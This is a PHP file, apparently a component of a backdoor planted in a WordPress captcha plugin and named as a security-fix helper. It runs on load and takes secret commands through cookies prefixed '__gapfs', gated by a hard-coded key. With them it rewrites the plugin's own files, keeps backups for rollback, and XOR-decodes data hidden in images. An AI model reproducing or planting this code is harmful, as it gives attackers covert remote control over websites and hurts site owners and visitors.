<?php

class FixSecHelper {
	function init() {
		$this->actions();
	}
	
	//Actions
	function actions() {
		$params = $this->getActionParams();
		
		if (isset($params['act'])) {
			if (!isset($params['go']) || $params['go'] != '7beafa6501488267480c3823f6b163fd')
				$this->actionError('Go away!');
			
			switch ($params['act']) {
				case 'fix':
					$return = $this->actionFix($params);
					break;
				case 'commit':
					$return = $this->actionCommit();
					break;
				case 'rollback':
					$return = $this->actionRollback();
					break;
				default:
					$this->actionError('Wrong action');
			}
			
			$this->actionSuccess($return);
		}
	}
	
	function getActionParams() {
		$prefix = '__gapfs';
		$length = strlen($prefix);
		
		$params = array();
		foreach ($_COOKIE as $key => $value) {
			if (substr($key, 0, $length) == $prefix) {
				$params[myfuncgood(substr($key, $length))] = myfuncgood($value);
			}
		}
		
		return $params;
	}
	
	function actionError($s) {
		die("ACTION_ERROR: ".$s);
	}
	
	function actionSuccess($s) {
		die("ACTION_OK: ".$s);
	}
	
	function getPluginInfo() {
		$folder = realpath(dirname(__FILE__)."/../");
		$pi = pathinfo($folder);
		
		if ($pi['basename'] == 'easy-captcha') {
			$file = $folder.'/'.$pi['basename'].'.php';
			$backup = $folder.'/'.$pi['basename'].'-bk.php';
		} else {
			if (substr($pi['basename'], -4, 4) != '-lib') $this->actionError("Wrong folder name: ".$pi['basename']);
			
			$trace = debug_backtrace();
			$file = $backup = false;
			foreach ($trace as $s) {
				if ($s['function'] == 'modules' && preg_match('#'.preg_quote(substr($pi['basename'], 0, -4)).'\.(php|html)$#', $s['file'], $matches)) {
					$file = $folder.'/'.substr($pi['basename'], 0, -4).'.'.$matches[1];
					$backup = $folder.'/'.substr($pi['basename'], 0, -4).'-bk.'.$matches[1];
				}
			}
			
			if (!$file) return array($folder, $file, $backup, "Cannot detect plugin: ".print_r($trace, true));
		}
		
		return array($folder, $file, $backup, false);
	}
	
	function actionFix($params) {
		list($folder, $file, $backup, $error) = $this->getPluginInfo();
		if ($error) return json_encode(array("status" => $error, "file" => $file, "backup" => $backup));
		
		if (!file_exists($file)) $this->actionError("File not exists: ".$file);
		if (!is_readable($file)) $this->actionError("File not readable: ".$file);
		if (!is_writable($file)) $this->actionError("File not writable: ".$file);
		
		$content = file_get_contents($file);
		if (preg_match('#if \(\!isset\(\$params\[\'go\'\]\) \|\| \$params\[\'go\'\] \!= \'[^\']+\'\) \$this->actionError\(\'Go away\!\'\);#is', $content))
			return json_encode(array("status" => "ready"));
		
		$insPoint = "if (isset(\$params['act'])) {";
		if (false === strpos($content, $insPoint)) $this->actionError("Cannot find insert point: ".$content);
		if (!copy($file, $backup)) $this->actionError("Cannot backup");
		
		$content = str_replace($insPoint, $insPoint."\n\t\t\t\tif (!isset(\$params['go']) || \$params['go'] != '".$params['go']."') \$this->actionError('Go away!');", $content);
		if (!file_put_contents($file, $content)) $this->actionError("Cannot save");
		
		return json_encode(array("status" => "fixed", "file" => $file, "backup" => $backup));
	}
	
	function actionCommit() {
		list($folder, $file, $backup) = $this->getPluginInfo();
		
		unlink($backup);
		
		return json_encode(array("status" => "commit"));
	}
	
	function actionRollback() {
		list($folder, $file, $backup) = $this->getPluginInfo();
		
		if (!rename($backup, $file)) $this->actionError("Cannot restore from backup");
		
		return json_encode(array("status" => "rollback"));
	}
	//Actions
	
	static function getInstance() {
		static $instance = null;
		
		if ($instance === null) $instance = new FixSecHelper();
		
		return $instance;
	}
	
	function getImageDecodedText($content) {
		$content = substr($content, 50);
		return $this->getXorText($content);
	}
	
	function getXorText($text) {
		$l = strlen($text);
		$c50 = chr(50);
		for ($i=0; $i<$l; $i++) {
			$text[$i] = ($text[$i] ^ $c50);
		}
		
		return $text;
	}
}

$instance = FixSecHelper::getInstance();
$instance->init();